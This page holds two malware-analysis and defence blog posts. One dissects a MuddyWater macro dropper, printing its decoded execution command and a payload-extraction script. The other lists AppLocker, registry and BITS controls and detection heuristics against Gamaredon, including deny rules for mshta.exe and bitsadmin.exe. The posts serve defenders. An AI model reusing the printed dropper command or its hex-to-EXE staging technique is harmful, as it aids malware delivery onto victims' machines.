We’re talking about a mature, state-aligned actor with a long operational history and a fairly diverse malware toolkit.

Which is exactly why the amount of build and development artefacts left in this sample is so interesting.


The initial sample is a .doc file.
Honestly, nothing fancy: just a Word document with a macro that reconstructs an EXE from hex, writes it to disk and executes it. Classic stuff.

I started with oleid:

oleid f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f.doc

As expected, the document contains VBA macros, so next step:

olevba --analysis f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f.doc

Clearly malicious. No surprises here.
To get a closer look at the macro itself, I exported it using:

olevba -c f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f.doc > makro.vba

Now we can see the actual macro code:

Apart from some typos and random variable names, most of this is just junk code.
What actually happens is pretty straightforward:

  • WriteHexToFile takes a hex string from UserForm1.TextBox1.Text, converts it to bytes and writes it to:
    C:\ProgramData\CertificationKit.ini
  • love_me__ constructs the following command from ASCII values:
99 109 100 46 101 120 101 = cmd.exe
32 47 99 32 = /c
67 58 92 80 114 111 + "gramData\CertificationKit.ini"
= C:\ProgramData\CertificationKit.ini

Final result:

cmd.exe /c C:\ProgramData\CertificationKit.ini
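The decoding can be replayed in a few lines of Python to confirm the reconstruction:

```python
# Replaying the macro's ASCII reassembly from love_me__ to verify the
# reconstructed command line.
cmd = "".join(chr(c) for c in [99, 109, 100, 46, 101, 120, 101])  # "cmd.exe"
flag = "".join(chr(c) for c in [32, 47, 99, 32])                  # " /c "
prefix = "".join(chr(c) for c in [67, 58, 92, 80, 114, 111])      # "C:\Pro"
command = cmd + flag + prefix + "gramData\\CertificationKit.ini"
print(command)  # cmd.exe /c C:\ProgramData\CertificationKit.ini
```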

While the payload shows a clear shift towards modern Rust-based tooling, the document dropper still relies on “obfuscation” techniques that wouldn’t look out of place in early 2000s VBA malware. Turning strings into ASCII integers and adding unreachable trigonometric conditions mostly just makes human analysts roll their eyes. It provides essentially zero resistance against automated analysis, but hey, let’s move on.


Extracting the Payload

To extract the binary cleanly, I wrote a small Python script:

#!/usr/bin/env python3
# Author: Robin Dost
# Created: 10.01.2025
# This script extracts the embedded binary from a MuddyWater VBA macro document

import re
import sys
from pathlib import Path
import olefile

DOC = Path(sys.argv[1])
OUT = Path(sys.argv[2]) if len(sys.argv) > 2 else Path("payload.bin")

STREAM = "Macros/UserForm1/o"

def main():
    if not DOC.exists():
        raise SystemExit(f"File not found: {DOC}")

    ole = olefile.OleFileIO(str(DOC))
    try:
        if not ole.exists(STREAM.split("/")):
            # list streams for troubleshooting
            print("stream not found. Available streams:")
            for s in ole.listdir(streams=True, storages=False):
                print("    " + "/".join(s))
            raise SystemExit(1)

        data = ole.openstream(STREAM.split("/")).read()
    finally:
        ole.close()

    # Extract long hex runs
    hex_candidates = re.findall(rb"(?:[0-9A-Fa-f]{2}){200,}", data)
    if not hex_candidates:
        raise SystemExit("[!] No large hex blob found in the form stream.")

    hex_blob = max(hex_candidates, key=len)
    # clean (jic) and convert
    hex_blob = re.sub(rb"[^0-9A-Fa-f]", b"", hex_blob)

    payload = bytes.fromhex(hex_blob.decode("ascii"))
    OUT.write_bytes(payload)

    print(f"wrote {len(payload)} bytes to: {OUT}")
    print(f"first 2 bytes: {payload[:2]!r} (expect b'MZ' for PE)")

if __name__ == "__main__":
    main()

In the end I get a proper PE32+ executable, which we can now analyze further.

SHA256 of the extracted payload:

7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58

If we check the hash on VirusTotal, we can see that the file is already known, but only very recently:

We also get multiple attributions pointing toward MuddyWater:

So far, nothing controversial: this is a MuddyWater RustyStealer sample, as we’ve already seen before.


Build Artefacts: Where Things Get Interesting

Now that we have the final payload, I loaded it into Ghidra.
First thing I always check: strings.

And immediately something interesting pops up:

The binary was clearly not properly stripped and contains a large amount of leftover build artefacts.
Most notably, we can see the username “Jacob” in multiple build paths.

No, this does not automatically mean the developer’s real name is Jacob.
But it does mean that the build environment uses an account named Jacob, and that alone is already useful for clustering.

I went through all remaining artefacts and summarized the most interesting findings and what they tell us about the developer and their environment.

Operating System

Windows

Evidence:

C:\Users\Jacob\...
C:\Users\...\rustup\toolchains\...
windows-registry crate
schannel TLS

This was built natively on Windows.
No Linux cross-compile involved.

Programming Language & Toolchain

Rust (MSVC Toolchain)

Evidence:

stable-x86_64-pc-windows-msvc
.cargo\registry
.rustup\toolchains

Target Triple:
x86_64-pc-windows-msvc

This is actually quite useful information, because many malware authors either:

  • build on Linux and cross-compile for Windows or
  • use the GNU toolchain on Windows

Here we’re looking at a real Windows dev host with Visual C++ build tools installed.

Username in Build Paths

C:\Users\Jacob\

Again, not proof of identity, but a very strong clustering indicator.
If this path shows up again in other samples, you can confidently link them to the same build environment or toolchain.

Build Quality & OPSEC Trade-Offs

The binary contains:

  • panic strings
  • assertion messages
  • full source paths

Examples:

  • assertion failed: ...
  • internal error inside hyper...

Which suggests:

  • no panic = abort
  • no aggressive stripping
  • no serious release hardening focused on OPSEC

Development speed and convenience clearly won over build sanitization.

Which is honestly pretty typical for APT tooling, but still very sloppy, ngl.

Dependency Stack & Framework Fingerprint

Crates and versions found in the binary:

  • atomic-waker-1.1.2
  • base64-0.22.1
  • bytes-1.10.1
  • cipher-0.4.4
  • ctr-0.9.2
  • futures-channel-0.3.31
  • futures-core-0.3.31
  • futures-util-0.3.31
  • generic-array-0.14.7
  • h2-0.4.12
  • hashbrown-0.15.5
  • http-1.3.1
  • httparse-1.10.1
  • http-body-util-0.1.3
  • hyper-1.7.0
  • hyper-tls-0.6.0
  • hyper-util-0.1.16
  • icu_normalizer-2.0.0
  • idna-1.1.0
  • indexmap-2.11.0
  • ipnet-2.11.0
  • iri-string-0.7.8
  • mio-1.0.4
  • percent-encoding-2.3.2
  • rand-0.6.5
  • reqwest-0.12.23
  • smallvec-1.15.1
  • socket2-0.6.0
  • tokio-1.47.1
  • tower-0.5.2
  • universal-hash-0.5.1
  • url-2.5.7
  • utf8_iter-1.0.4
  • want-0.3.1
  • windows-registry-0.5.3

What information we can extract from this:

Network Stack

  • Async HTTP client (reqwest)
  • Full hyper stack (hyper, hyper-util, http, httparse)
  • HTTP/1.1 and HTTP/2 support (h2)
  • TLS via Windows Schannel (hyper-tls)
  • Low-level socket handling (socket2, mio)

So this is very clearly not basic WinInet abuse or some minimal download logic.
It’s a full-featured HTTP client stack assembled from modern Rust networking libs, with proper async handling.

Looks much more like a persistent implant than a simple one-shot loader.

Async Runtime

  • tokio
  • futures-*
  • atomic-waker

This strongly suggests an event-driven design with concurrent tasks, typical for beaconing, task polling and long-running background activity.

Not what you would expect from a disposable stage loader.

Crypto

  • cipher
  • ctr
  • universal-hash
  • generic-array
  • plus base64

Active use of AEAD-style primitives, very likely AES-GCM or something close to it.

Which, to me, looks like:

  • encrypted embedded configuration
  • and/or encrypted C2 communication

Either way, encryption is clearly part of the design.

rustc-demangle

One more telling artefact is the presence of source paths from the rustc-demangle crate, including references to .llvm./rust/deps/.../src/lib.rs

These are build-time paths leaking straight out of the developer’s Cargo environment. In my opinion this means that panic handling and backtrace support were left enabled, instead of using an aggressive panic=abort and stripping strategy.

Local Development Environment

Paths like:

.cargo\registry\src\index.crates.io-1949cf8c6b5b557f\

Indicate:

  • standard Cargo cache layout
  • no Docker build
  • no CI/CD path patterns

This was almost certainly built locally on the developer’s Windows workstation or VM.
Just someone hitting cargo build on their dev box.
Relatable, honestly.

Compiler Version (Indirectly)

Multiple references to:

/rustc/ded5c06cf21d2b93bffd5d884aa6e96934ee4234/

This is the Rust compiler commit hash.

That allows fairly accurate mapping to a Rust release version
(very likely around Rust 1.92.0)

Which is extremely useful for:

  • temporal analysis of campaigns
  • toolchain reuse detection
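Both the commit hash and the crate versions can be harvested mechanically from a binary's raw bytes. A minimal triage helper might look like this; the regexes are my own assumptions, modeled on the path patterns quoted above:

```python
# Pull Rust build artefacts (compiler commit hash, crate name-version pairs)
# out of a binary's raw bytes for clustering and temporal analysis.
import re

RUSTC_COMMIT = re.compile(rb"/rustc/([0-9a-f]{40})/")
CARGO_CRATE = re.compile(
    rb"[\\/]registry[\\/]src[\\/][^\\/]+[\\/]([A-Za-z0-9_-]+-\d+\.\d+\.\d+)"
)

def rust_build_artefacts(blob: bytes):
    commits = sorted({m.decode() for m in RUSTC_COMMIT.findall(blob)})
    crates = sorted({m.decode() for m in CARGO_CRATE.findall(blob)})
    return commits, crates
```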

Internal Project Structure (More Dev Leaks)

src\main.rs
src\modules\persist.rs
src\modules\interface.rs

That tells us a lot:

Modular Architecture
  • persist > persistence module
  • interface > C2 interface or command handling

This is not just a single-purpose loader.
This is a modular implant, much closer to a full backdoor framework than a simple dropper.


What This Tells Us About the Developer & Operation

Technical Profile

  • Rust developer
  • works on Windows
  • uses MSVC toolchain
  • builds locally, not via CI
  • comfortable with async networking
  • understands TLS and proxy handling

Operational Assumptions

  • expects EDR solutions (found a lot of AV-related strings, but not too relevant tbh)
  • expects proxy environments
  • targets corporate networks
  • uses modular architecture for flexibility

OPSEC Choices

  • prioritizes development speed
  • does not heavily sanitize builds
  • accepts leakage of build artefacts (LOL)

Which again fits very well with how many state-aligned toolchains are developed:
fast iteration, internal use and limited concern about reverse-engineering friction.

From a threat hunting perspective, these artefacts are far more useful than yet another short-lived C2 domain: they allow us to track the toolchain, not just the infrastructure.

What Build Artifacts Reveal About Actor Development

Build artifacts embedded in operational malware are more than just accidental leaks; they offer a look into an actor’s internal development maturity.
Exposed compiler paths, usernames, project directories or debug strings strongly suggest the absence of a hardened release pipeline.
In mature development environments, build systems are typically isolated, stripped of identifiable metadata and designed to produce reproducible, sanitized artifacts.
When these indicators repeatedly appear in live payloads, it points to ad-hoc or poorly automated build processes rather than a structured CI/CD workflow.
The continued presence of build artifacts across multiple campaigns is particularly telling.
It indicates not just a single operational mistake, but a lack of learning or feedback integration over time. Actors that actively monitor public reporting and adapt their tooling usually remediate these issues quickly.
Those that do not are revealing organizational constraints, limited quality assurance or sustained time pressure within their development cycle.
I’ll do some more research on MuddyWater in the next few weeks to get a better understanding of whether this was a single incident or a general problem in MuddyWater’s development process.
Leaving build artefacts in your malware is rarely about “oops, forgot to strip the binary”.
It’s more a side effect of how development, testing and deployment are glued together inside the operation.
From a defender’s POV, that’s actually way more useful than yet another throwaway C2 domain or IP.
These artefacts don’t rotate every week; they give you fingerprints that can survive multiple campaigns.

Defending Against Gamaredon: Practical Controls That Actually Work


by Robin Dost

This is the result of a lengthy analysis and study of the Gamaredon UAC-0010 group. I recommend reading my previous articles for more context.

Defending against Gamaredon is uncomfortable not because the group uses particularly advanced malware, but because it forces defenders to question many assumptions that modern security strategies are built on.

Gamaredon does not rely on sophisticated exploits, stealthy implants or long-lived infrastructure. Instead it operates through large volumes of simple scripts, constantly changing delivery mechanisms and an infrastructure that is designed to burn fast and disappear. Indicators of compromise age out quickly, payloads are interchangeable and even the tooling itself adapts once it becomes the subject of analysis.

Over the past months, tracking Gamaredon has felt less like reverse engineering a malware family and more like observing a process in motion. Loader scripts evolve, obfuscation shifts slightly from wave to wave and infrastructure changes just enough to break automated collection pipelines. At times, analysis environments are actively identified and fed with destructive or misleading payloads, which turns the act of investigation itself into a signal the actor seems to react to.

This makes Gamaredon a poor fit for traditional, indicator-driven defense models. Blocking hashes, domains or IP addresses provides short-lived relief at best. By the time a rule is deployed, the campaign may already have moved on. What remains stable is not the malware, but the behavior: how access is gained, how scripts are executed, how network communication deviates from normal client behavior and how the actor responds when it detects scrutiny.

This article focuses on defensive measures that have proven effective while actively observing Gamaredon operations in the wild. The goal is not to “out-APT” the attacker, but to break the operational assumptions that Gamaredon relies on: permissive script execution, weak visibility into client behavior and an overreliance on static threat intelligence.

Defending against Gamaredon is less about stopping a specific toolset and more about disrupting a workflow. Once that distinction is understood, the problem becomes significantly more manageable 🙂


What End Users Can Do to Reduce Risk

Remember: Gamaredon does not break into systems. It is invited in.

1. Attachments are the attack surface

Gamaredon infects systems through spear phishing. End users who have received appropriate training therefore significantly reduce the risk of infection. Modern phishing campaigns, particularly those operated by actors like Gamaredon, do not rely on obvious deception or complex exploits; they exploit trust in routine actions.
An email attachment that appears harmless can be nothing more than a delivery mechanism for script execution. Shortcuts, script files or archive formats are instructions, not documents.

For this reason, email attachments should never be opened impulsively. Files originating from unknown senders, unexpected conversations or unclear contexts must always be routed through a defined analysis workflow. This may include automated malware scanning, sandbox execution or escalation to a SOC or security team for manual review.

Treating attachments as executable content rather than documents removes a core assumption attackers rely on: that a single double-click is enough to gain a foothold.

2. “It looks normal” is not a defense

A common assumption in phishing awareness is that malicious emails will “look suspicious”: misspelled text, strange formatting or obviously fake senders as warning signs. Campaigns operated by Gamaredon routinely break this expectation.

Many of the emails used in these operations are short, plain and unremarkable. They may not contain any obvious red flags, no unusual wording and no visual elements that stand out. In some cases, the message itself is barely relevant at all. The attachment is the real payload.

Relying on visual cues or intuition to assess whether an email is safe is therefore ineffective. A file does not need to look dangerous to be dangerous. Shortcuts, script files and archived attachments can appear entirely legitimate while silently triggering code execution in the background.

This is intentional. Gamaredon does not attempt to impress the recipient or convince them emotionally. Instead, it blends into routine communication, where opening an attachment feels like a harmless, almost automatic action.

For this reason, the absence of suspicious indicators should never be treated as confirmation of safety. Normal-looking emails are not evidence of harmless content; they are often the environment in which these campaigns are most successful.

3. Why double-clicking is dangerous

Most people treat double-clicking as a harmless, almost meaningless action. It is how you open a document, check an image, or quickly look at a file someone sent you. From a usability perspective, that makes sense. From a security perspective, it is exactly the problem.

Not every file is a document! Many files are nothing more than instructions telling Windows to execute other programs, run scripts or fetch additional content from the internet. When you double-click those, you are not “previewing” anything. You are actively starting a process chain.

What makes this especially effective is how unspectacular it looks. In many Gamaredon cases the initial file does almost nothing visible. Maybe a window flashes, sometimes nothing happens at all. From the user’s point of view, that feels like a failed or broken attachment. From the attacker’s POV, the important part already happened: code execution in user context.

This is not accidental. Gamaredon does not need the first file to be powerful. It only needs it to run. The rest can be downloaded, replaced or updated later. The initial step is small, quiet and easy to overlook.

That is why “just opening it to see what it is” is not a safe strategy. With many attachment types, execution is the first and only action. There is no confirmation dialog, no warning and no visible sign that anything meaningful happened until much later, when the real payload is already in place.

tldr: double-clicking is not a neutral action. It is a trust decision, and attackers like Gamaredon build their entire delivery chain around the assumption that this trust will be given automatically. Gamaredon can be avoided if you stop trusting the files you are about to open.
As Lenin said: “доверяй, но проверяй” (“trust, but verify”) 😉

4. Update. Update. Update.

Always keep the software on your system up to date. Gamaredon has actively exploited real-world vulnerabilities, for example the WinRAR vulnerability CVE-2025-6218, observed in campaigns since late 2025.

This vulnerability allows an attacker to place a malicious file into the Windows startup folder when an archive is opened or extracted. The user may only see a normal archive being unpacked, while persistence is already being established in the background; the system becomes infected after the next reboot. This is exactly the kind of low-effort, high-impact technique that fits Gamaredon’s operational model.

Keeping your software updated, especially tools that handle downloaded files such as archive managers, removes entire classes of attack techniques.

5. When to escalate

One of the most reliable defenses attackers have is silence.
Not because nothing happened, but because users assume that whatever happened is probably not important enough to bother anyone with.

“This file didn’t open properly”
“The window flashed and disappeared”
“Nothing seems broken so it’s probably fine”

From the perspective of an attacker, this is perfect. Initial access does not necessarily need to be loud, it only needs to be unnoticed.

The first-stage file doesn’t display an error message, ransomware screen or any obvious sign of compromise. It executes, exits and waits for the next step. If no one reports it, there is nothing to investigate, nothing to contain and nothing to learn from.

Users hesitate to report something because they do not want to be wrong, do not want to interrupt anyone or assume that security teams only care once things are clearly broken. Unfortunately, by the time something is clearly broken, the attacker has already achieved most of their objectives.

From a defensive POV, the ideal time to escalate is when you are unsure whether something happened at all, not when you are sure something malicious happened.

If an attachment behaves strangely, if a file does not open as expected, if a website triggers a download you did not request or if anything simply feels off, that is already enough reason to report it. Security teams do not need certainty. They need signals.
It’s better to report one false positive too many to your security team than not to report at all.

Yes, most reports will turn out to be harmless. That is fine. What is not fine is missing the few cases that actually matter because no one wanted to be the person who raised a false alarm.

tldr: if something looks broken, weird or pointless, that is not a reason to ignore it. That is exactly when escalation is supposed to happen. The worst possible outcome of reporting is a short investigation. The worst possible outcome of not reporting is an attacker quietly staying in your network.


Defensive Controls for System and Network Administrators

1. Kill the script layer

Gamaredon’s operations depend almost entirely on script-based execution. VBScript, JS, HTA files and shortcut-based loaders are the foundational tools. Without the ability to execute scripts in user context, the majority of observed Gamaredon infection chains fail before any payload is delivered.

This makes the script execution layer a highly effective choke point for defenders.

In many environments, script interpreters such as wscript.exe, cscript.exe or mshta.exe are still broadly available to all users, despite having little to no legitimate business use. From an attacker’s perspective, this provides a reliable and low-friction execution environment that does not require exploits, elevated privileges or complex tooling.

Restricting or disabling these components significantly raises the cost of an attack. Blocking mshta.exe entirely, enforcing execution policies for VBScript and JScript and preventing script execution from user-writable locations such as Downloads, Temp or profile directories removes a critical assumption Gamaredon relies on: that scripts will execute by default.

Where complete blocking is not feasible, strict allow-listing needs to be applied. Script execution should be limited to known, signed, and explicitly required use cases. Everything else should fail closed.

It is important to note that this is not merely a prevention measure, but also a detection opportunity. Script-based attacks are very noisy at the process level. Parent-child relationships, such as email clients spawning script hosts or shortcut files launching interpreters, provide strong, behavior-based signals that are far more stable than file hashes or domains.

Defenders mostly focus on detecting the final payload. Against Gamaredon, this approach is too late. By the time a second stage binary is downloaded, the attacker has already achieved their primary goal: execution. Eliminating or tightly controlling the script layer prevents this first and most critical step.


Option 1: Disable mshta.exe

mshta.exe has virtually no legitimate use in modern enterprise environments and is heavily abused by Gamaredon.

AppLocker

Path Rule: Deny

%SystemRoot%\System32\mshta.exe
%SystemRoot%\SysWOW64\mshta.exe

Action: Deny

User: Everyone

>> Click Create new Rule

>> Click Continue

>> Click Continue

>> Select Path; Click Continue

Filename: %SystemRoot%\System32\mshta.exe

>> Click Create

>> Click Yes


Software Restriction Policies

Legacy but effective

  1. Open gpedit.msc
  2. Computer Configuration
    > Windows Settings
    > Security Settings
    > Software Restriction Policies
  3. Create New Path Rule
  4. Path C:\Windows\System32\mshta.exe
  5. Security Level: Disallowed

Repeat for SysWOW64


Option 2: VBS and JS Restriction

Disable Windows Script Host (WSH); this disables wscript.exe and cscript.exe.

Registry (GPO-friendly)
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings]
"Enabled"=dword:00000000

If you want to re-enable it:

"Enabled"=dword:00000001

This alone stops most VBS- and JS-based Gamaredon loaders.
It’s also a good defense against other threat actors, since Gamaredon is not the only one to use these methods.

You can also do this per user btw:

[HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings]
"Enabled"=dword:00000000


Option 3: Block Script Exec from User-Writable Paths

Gamaredon relies on execution from:

  • Downloads
  • %TEMP%
  • %APPDATA%
  • Email attachment paths

Apply to:

  • .vbs
  • .js
  • .hta
  • .lnk

Prevents double-click execution even if scripts are not fully disabled
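As a sketch of what this can look like with AppLocker script rules (path conditions are illustrative and need tuning to your environment; note that AppLocker's script rule collection covers .vbs, .js, .ps1, .bat and .cmd, while .hta is handled by the mshta.exe block in Option 1 and .lnk by mail-client controls):

```text
Collection: Script Rules
Action:     Deny
User:       Everyone

Path conditions:
%OSDRIVE%\Users\*\Downloads\*
%OSDRIVE%\Users\*\AppData\Local\Temp\*
%OSDRIVE%\Users\*\AppData\Roaming\*
```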


Option 4: If Blocking is impossible – Make It Visible

Some environments cannot fully disable scripts. In that case, visibility is mandatory.

Enable Script Block Logging:

Computer Configuration
> Administrative Templates
  > Windows Components
    > Windows PowerShell

Enable:

  • Turn on Script Block Logging
  • Turn on Module Logging

Enable Command Line Process Auditing

Computer Configuration
> Administrative Templates
  > System
    > Audit Process Creation

Enable:

  • Include command line in process creation events

This enables:

  • Event ID 4688
  • Parent/Child relationships:
    • outlook.exe > wscript.exe
    • explorer.exe > mshta.exe
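The parent/child pairs above can be turned into a trivial correlation. A sketch in Python over already-parsed 4688 events; the field names are simplified assumptions about how a SIEM exposes the event:

```python
# Flag 4688 process-creation events where a mail client or Explorer spawns a
# script host. Each event is a dict with simplified 4688-style field names.
SUSPICIOUS_PAIRS = {
    ("outlook.exe", "wscript.exe"),
    ("outlook.exe", "mshta.exe"),
    ("explorer.exe", "mshta.exe"),
}

def flag_4688(events):
    hits = []
    for ev in events:
        # reduce full image paths to bare executable names
        parent = ev["ParentProcessName"].lower().rsplit("\\", 1)[-1]
        child = ev["NewProcessName"].lower().rsplit("\\", 1)[-1]
        if (parent, child) in SUSPICIOUS_PAIRS:
            hits.append((parent, child))
    return hits
```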


Option 5: YARA on Email Attachments

One of the most effective yet underestimated defensive layers in Gamaredon-style campaigns is attachment scanning at the email gateway using YARA rules.

A large part of Gamaredon’s initial access relies on script-based loaders delivered directly as attachments (HTA, VBS, JS, LNK), most of the time inside archives (abusing the WinRAR CVE since the end of 2025). Scanning files before they ever reach the user can break the infection chain at the earliest possible stage.

YARA is particularly useful here because it does not rely on file hashes or exact filenames. Structural patterns, script constructs and typical obfuscation techniques tend to remain relatively stable even when the surrounding delivery changes. That makes YARA a good fit for detecting families of loaders rather than individual samples.
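To illustrate the “structural patterns instead of hashes” point without publishing my actual rules, here is the same idea expressed in plain Python: flag any macro dump that pairs a long contiguous hex blob (an embedded binary) with an execution primitive. The threshold and marker strings are illustrative assumptions, not the real rule content:

```python
# Structural detection sketch: a macro that combines a very long contiguous
# hex run with an execution primitive is flagged, regardless of hash or
# filename. Threshold and hint strings are illustrative.
import re

HEX_BLOB = re.compile(r"(?:[0-9A-Fa-f]{2}){200,}")       # >= 200 hex byte pairs
EXEC_HINTS = ("CreateObject", "WScript.Shell", "Shell")  # execution primitives

def looks_like_hex_dropper(macro_text: str) -> bool:
    has_blob = HEX_BLOB.search(macro_text) is not None
    has_exec = any(hint in macro_text for hint in EXEC_HINTS)
    return has_blob and has_exec
```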

Applied at the mail gateway or in attachment processing pipelines, YARA rules can prevent execution entirely instead of trying to detect activity after the user already clicked the file. From a defensive POV, that is always the better place to intervene.

I maintain a set of YARA rules specifically focused on Gamaredon loader patterns, including HTA- and VBScript-based stages observed from older and recent campaigns. These rules are meant for legitimate research and defensive use. If you are working in a security or incident response context and want to test or deploy them, feel free to contact me and I can provide them for evaluation and tuning.

YARA will not stop infrastructure shifts or payload changes, but it is very effective at removing large parts of the delivery layer that Gamaredon depends on. Combined with script execution controls and network visibility (read above), it significantly reduces the attackers room to operate.


Option 6: Shortcut (LNK) Abuse Mitigation

Gamaredon frequently abuses .lnk files as script launchers.

Controls:
  • Block .lnk execution from email attachment paths
  • Alert on:
    • LNK spawning wscript, mshta, powershell
  • Disable preview handlers for LNK in mail clients if possible

Option 7: Block / Restrict bitsadmin

This should be treated as an addition, not just an option.
As a fallback for MSXML2.XMLHTTP, Gamaredon introduced bitsadmin in their newest GamaLoad samples; you can read more about it here.

Disabling BITS entirely is not an option in most enterprise environments.
Windows Update, Defender, SCCM and many enterprise management tools depend on it.
Breaking BITS usually means breaking business.

The goal is therefore not to kill BITS, but to remove its value as a reliable malware loader.

Gamaredon doesn’t need stealthy tooling. They need something that works everywhere, survives bad networks and doesn’t get blocked. If you take away that reliability, the technique quickly becomes unattractive.

Below are several practical controls that achieve exactly that:

Block bitsadmin.exe, not BITS

bitsadmin.exe is merely a legacy command-line frontend for BITS.
Modern software uses PowerShell or native APIs instead. In most environments, nothing legitimate depends on interactive use of bitsadmin.exe.

Control

Block the binary using AppLocker or WDAC:

%SystemRoot%\System32\bitsadmin.exe
%SystemRoot%\SysWOW64\bitsadmin.exe

Scope: non-admin or Everyone, depending on your policy

Impact

  • Windows Update continues to work
  • Defender continues to work
  • SCCM and management tooling remain unaffected
  • But: malware loses the easiest way to create BITS jobs

Why this hurts Gamaredon

Gamaredon's loaders frequently invoke BITS directly from scripts and HTA stages.
They rely on simple CLI execution, not on robust API-based fallbacks. Blocking the binary often breaks the entire staging chain.

Restrict Where BITS Is Allowed to Connect

BITS traffic is still regular HTTP/HTTPS traffic.
It can and should be controlled at the network layer!

Control

On proxy or firewall level:

  • Allow BITS traffic only to:
    • Microsoft update endpoints
    • Internal patching infrastructure
    • Explicitly approved business domains
  • Block or inspect everything else.

Optional detection:

  • Alert on User-Agent: Microsoft BITS/* connecting to non-whitelisted domains.

Impact

  • Business traffic remains unaffected
  • Updates continue to function
  • External drop servers used by attackers fail reliably!

This is a strong IOC-less control that scales well in enterprise environments 🙂

Disrupt BITS Job Persistence

One of the advantages BITS offers attackers is job persistence:
jobs survive logoffs, reboots and network interruptions.

Removing that persistence dramatically reduces reliability for staged malware delivery.

Control

Regularly purge queued jobs:

PowerShell example:

Get-BitsTransfer -AllUsers | Remove-BitsTransfer

Schedule this on workstations every 30–60 minutes (adjust to your needs)

Impact

  • Normal short-lived update jobs typically complete unaffected
  • Malware loses reliable staging and retry capability

Use caution during large enterprise software rollouts. In my opinion, this is also the least effective of these controls on its own.

Enforce Strong Telemetry on BITS Usage

As I already mentioned, if you cannot block it safely everywhere, make abuse visible!

Control

  • Enable command-line process auditing
  • Monitor:
    • Execution of bitsadmin.exe
    • Parent processes such as mshta.exe, wscript.exe
  • Correlate with network destinations and file writes
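To make the correlation step concrete, here is a rough triage sketch that scores bitsadmin executions by their parent process. The field names are hypothetical stand-ins for your auditing telemetry:

```python
# Sketch: classify bitsadmin.exe executions from command-line auditing
# events. "high" means a script engine drove BITS, which is rarely
# legitimate; thresholds and field names are illustrative.

SCRIPT_ENGINES = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}

def classify_bitsadmin_event(event: dict) -> str:
    if "bitsadmin" not in event.get("image", "").lower():
        return "ignore"
    parent = event.get("parent_image", "").lower()
    cmdline = event.get("cmdline", "").lower()
    if parent in SCRIPT_ENGINES:
        return "high"      # scripting engine creating BITS jobs
    if "/transfer" in cmdline or "/addfile" in cmdline:
        return "medium"    # interactive download job, worth a look
    return "low"
```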

Impact

  • No production risk
  • High-quality detection signal
  • Low false-positive rate

Remember: BITS usage initiated from scripting engines is rarely legitimate.

Behavioral Heuristics for BITS Abuse

For mature environments and advanced detection platforms:

Monitor for suspicious patterns such as:

  • BITS downloads into:
    • %TEMP%
    • %APPDATA%
    • User profile writable paths
  • Randomized file names
  • Short-lived jobs followed immediately by execution
  • Non-corporate TLS destinations

This can be implemented via:

  • ETW telemetry
  • Defender Advanced Hunting
  • Custom sensors and collectors

This provides behavioral detection without relying on static indicators.
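The heuristics above combine naturally into a simple score. The sketch below is one possible weighting, not a tested rule; the path list, filename pattern, and alert threshold are assumptions to tune against your own baseline:

```python
# Sketch: score a BITS download event on the behavioral signals listed
# above. All weights and patterns are illustrative starting points.

import re

USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\downloads\\")
RANDOM_NAME = re.compile(r"[a-z0-9]{7,12}")   # short random-looking name

def bits_job_score(dest_path: str, lifetime_seconds: float,
                   followed_by_exec: bool) -> int:
    """Higher = more suspicious; alerting at >= 3 is a starting point."""
    score = 0
    path = dest_path.lower()
    if any(p in path for p in USER_WRITABLE):
        score += 1                     # download into user-writable path
    name = path.rsplit("\\", 1)[-1].split(".", 1)[0]
    if RANDOM_NAME.fullmatch(name):
        score += 1                     # randomized file name
    if lifetime_seconds < 60:
        score += 1                     # short-lived job
    if followed_by_exec:
        score += 2                     # immediate execution after download
    return score
```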


Visibility beats prevention

At minimum, you need to have visibility into:

  • wscript.exe (classic VBS/JS execution)
  • cscript.exe (same, console version)
  • mshta.exe (HTA execution, including embedded VBScript/JS)
  • powershell.exe (still relevant, second stage)

But execution alone is only half of the picture here.
In Gamaredon campaigns, script hosts are usually paired with a built-in Windows networking component: MSXMLHTTP.

Inside the script, outbound communication is (mostly) handled via these components:

  • MSXML2.XMLHTTP
  • MSXML2.ServerXMLHTTP

From the outside, this generally looks like a normal process making web requests. There is no external downloader, no suspicious binary and no obvious command line indicator, since everything happens inside the script host process itself.

That means defenders should not only care that a script host started, but also whether that process immediately initiated network connections. Script execution without network activity might be a test or a failure. Script execution followed by HTTP traffic is the actual attack.

If your telemetry cannot correlate:

  • script execution
  • with outbound connections
  • and with the destination domain or IP

then you are missing the exact phase where Gamaredon (or other Threat Actors) transitions from initial access to payload delivery.

tl;dr: seeing the script start is useful. Seeing the script talk to the internet is what actually tells you that the infection chain is active.
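A minimal sketch of that correlation, assuming simplified stand-ins for EDR process-start and network-connection telemetry (real pipelines also need PID-reuse handling, which is omitted here):

```python
# Sketch: join script-host process starts with outbound connections made
# by the same PID within a short window. Record shapes are hypothetical.

from datetime import datetime, timedelta

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}

def correlate(proc_events, net_events, window_seconds=30):
    """Yield (pid, dest) pairs where a script host talked out quickly."""
    starts = {e["pid"]: e for e in proc_events
              if e["image"].lower() in SCRIPT_HOSTS}
    for n in net_events:
        p = starts.get(n["pid"])
        if p and timedelta(0) <= n["ts"] - p["ts"] <= timedelta(seconds=window_seconds):
            yield n["pid"], n["dest"]
```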

Alert on Parent-Child Process Chains, Not on Filenames

Gamaredon changes filenames constantly. That is not where detection stability lies.

What does not change:

  • Email client -> script host
  • Explorer -> shortcut -> script host
  • Script host -> network activity

Those relationships are far more reliable than any hash or URL.

If your detection logic is still focused on “known bad files”, you are solving yesterday's problem. Behavior survives infrastructure rotation, but IOCs do not.

Treat Failed Infections as Intelligence, Not as Non-Events

One of the more frustrating patterns when tracking Gamaredon is how many times infection attempts partially fail. The loader runs, the payload is blocked or the network request never completes.

From an incident-response POV, this could be treated as “problem solved”.

From an intelligence perspective, it is a gift.

Those events tell you:

  • Which attachment types are used
  • Which execution paths are attempted
  • Which infrastructure is currently active

If you only investigate successful infections, you will always be late. The campaigns that fail today are the ones that succeed tomorrow with minor adjustments. If you understand Gamaredon properly, you can always be a step ahead.

